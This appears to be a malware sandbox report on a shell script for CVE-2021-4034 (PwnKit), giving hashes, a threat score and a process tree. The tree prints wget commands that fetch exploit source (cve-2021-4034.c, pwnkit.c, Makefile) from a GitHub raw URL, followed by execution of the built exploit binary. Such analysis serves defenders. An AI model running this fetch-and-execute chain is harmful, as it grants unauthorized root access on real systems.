Overview

overview

7

Static

static

1

CVE-2021-4...034.sh

ubuntu-18.04-amd64

6

CVE-2021-4...034.sh

debian-9-armhf

7

CVE-2021-4...034.sh

debian-9-mips

6

CVE-2021-4...034.sh

debian-9-mipsel

6

Analysis

  • max time kernel
    6s
  • max time network
    9s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231020-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20231020-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    23/10/2023, 23:31

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    CVE-2021-4034/cve-2021-4034.sh

  • Size

    305B

  • MD5

    151fcb01bcb58f6836dc4de76bc9672d

  • SHA1

    636089fa2cace9cc33f482d348e9de8cb5cfc571

  • SHA256

    a3c982eff2948f3dfbe97bdf3d631f8bb82c78e231b5f5978e4ef370fdc52174

  • SHA512

    929aaa36bdfa0a3db995f2391f5879cbef50ed79fbea72838e1306b0a7dbb90633e2b69a97b93687a2fa3880831a2af59b06c2db0e2f9ffc1e1ece9ce6896c83

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/CVE-2021-4034/cve-2021-4034.sh
    /tmp/CVE-2021-4034/cve-2021-4034.sh
    1⤵
      PID:340
    • /usr/local/sbin/sh
      sh /tmp/CVE-2021-4034/cve-2021-4034.sh
      1⤵
        PID:340
      • /usr/local/bin/sh
        sh /tmp/CVE-2021-4034/cve-2021-4034.sh
        1⤵
          PID:340
        • /usr/sbin/sh
          sh /tmp/CVE-2021-4034/cve-2021-4034.sh
          1⤵
            PID:340
          • /usr/bin/sh
            sh /tmp/CVE-2021-4034/cve-2021-4034.sh
            1⤵
              PID:340
            • /sbin/sh
              sh /tmp/CVE-2021-4034/cve-2021-4034.sh
              1⤵
                PID:340
              • /bin/sh
                sh /tmp/CVE-2021-4034/cve-2021-4034.sh
                1⤵
                  PID:340
                  • /usr/bin/wget
                    wget --no-hsts -q https://raw.githubusercontent.com/berdav/CVE-2021-4034/main//cve-2021-4034.c -O cve-2021-4034.c
                    2⤵
                    • Writes file to tmp directory
                    PID:344
                  • /usr/bin/wget
                    wget --no-hsts -q https://raw.githubusercontent.com/berdav/CVE-2021-4034/main//pwnkit.c -O pwnkit.c
                    2⤵
                    • Writes file to tmp directory
                    PID:358
                  • /usr/bin/wget
                    wget --no-hsts -q https://raw.githubusercontent.com/berdav/CVE-2021-4034/main//Makefile -O Makefile
                    2⤵
                    • Writes file to tmp directory
                    PID:363
                  • /tmp/CVE-2021-4034/cve-2021-4034
                    ./cve-2021-4034
                    2⤵
                      PID:365

                  Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads